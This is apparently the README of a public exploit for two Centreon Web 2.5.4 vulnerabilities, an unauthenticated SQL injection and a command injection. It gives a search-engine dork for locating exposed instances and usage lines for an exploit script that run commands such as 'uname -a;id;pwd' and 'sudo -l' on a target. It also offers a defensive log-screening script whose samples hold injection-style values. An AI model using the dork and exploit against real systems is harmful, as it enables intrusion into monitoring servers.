Centreo(w)n! 💥
An unauthenticated SQL injection vulnerability in the "isUserAdmin" function defined in "include/common/common-Func.php" in Centreon Web 2.5.4 and earlier allows remote attackers to execute arbitrary SQL commands via the "sid" parameter defined in "include/common/XmlTree/GetXmlTree.php". It works only if NDOUtils is installed and acts as Centreon Web's broker.
A command injection vulnerability exists in the "escape_command" function defined in "include/Administration/corePerformance/getStats.php" in Centreon Web 2.5.4 and earlier: the function uses an incorrect regular expression, which allows remote authenticated users to execute arbitrary commands via shell metacharacters in the "ns_id" parameter.
This exploit works as long as there is a valid "session_id" registered in the "centreon.session" table.
- Huy-Ngoc DAU (@ngocdh) - Deloitte Conseil
- Centreon Web 2.5.4 and earlier
July 8th, 2015
intitle:"Centreon - IT & Network Monitoring" intext:"2004|2005-2008|2009|2010|2011|2012|2013|2014"
$ python CVE-2015-1560-1561.py -r <RHOST> -p <RPORT> -u <URI> -c <CMD> [-s / -ssl]
$ python CVE-2015-1560-1561.py -r 192.168.0.3 -p 80 -u /centreon/ -c "uname -a;id;pwd"
$ python CVE-2015-1560-1561.py -r <RHOST> -p <RPORT> -u <URI> -c <CMD> -i <SESSION_ID> [-s / -ssl]
$ python CVE-2015-1560-1561.py -r 192.168.0.3 -p 80 -u /centreon/ -c "sudo -l" -i a2hlspgh62nd5cuvvpdhmm9r60
- Centreon Web 2.5.4
- Centreon Web 2.5.3
Upgrade Centreon Web.
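Until the upgrade is in place, web-server access logs can be screened for requests to the two affected endpoints whose "sid" or "ns_id" value falls outside the expected format. This is an added example, not part of the original repository; the allowed-value patterns (PHP session-ID alphabet for "sid", a numeric ID for "ns_id"), the Combined Log Format input and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint -> (parameter, pattern a benign value must fully match).
# Paths and parameter names come from the advisory text above; the allowed
# patterns are assumptions (PHP session-ID alphabet, numeric ID).
RULES = {
    "include/common/XmlTree/GetXmlTree.php":
        ("sid", re.compile(r"[A-Za-z0-9,-]{1,128}")),
    "include/Administration/corePerformance/getStats.php":
        ("ns_id", re.compile(r"[0-9]{1,10}")),
}

# Client address and request target from a Combined Log Format line (assumed).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_requests(log_lines):
    """Return (client, endpoint, param, value) for each out-of-pattern value.

    Only query-string parameters are visible in access logs; values sent in a
    POST body need inspection at a proxy or WAF instead.
    """
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        for endpoint, (param, allowed) in RULES.items():
            if not parts.path.endswith(endpoint):
                continue
            # parse_qs percent-decodes, so encoded metacharacters are seen too.
            values = parse_qs(parts.query, keep_blank_values=True).get(param, [])
            hits += [(client, endpoint, param, v)
                     for v in values if not allowed.fullmatch(v)]
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jul/2015:10:00:00 +0000] "GET /centreon/include/common/XmlTree/GetXmlTree.php?sid=a2hlspgh62nd5cuvvpdhmm9r60 HTTP/1.1" 200 512',
    '198.51.100.7 - - [08/Jul/2015:10:00:05 +0000] "GET /centreon/include/common/XmlTree/GetXmlTree.php?sid=abc%27 HTTP/1.1" 200 0',
    '198.51.100.7 - - [08/Jul/2015:10:00:09 +0000] "GET /centreon/include/Administration/corePerformance/getStats.php?ns_id=1%3Bx HTTP/1.1" 200 0',
    '192.0.2.10 - - [08/Jul/2015:10:01:00 +0000] "GET /centreon/include/Administration/corePerformance/getStats.php?ns_id=1 HTTP/1.1" 200 734',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A hit is a triage lead rather than proof of compromise; correlate the client address with the "centreon.session" table and the web server's process activity.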
Usage is provided under the WTFPL license.
See LICENSE for the full details.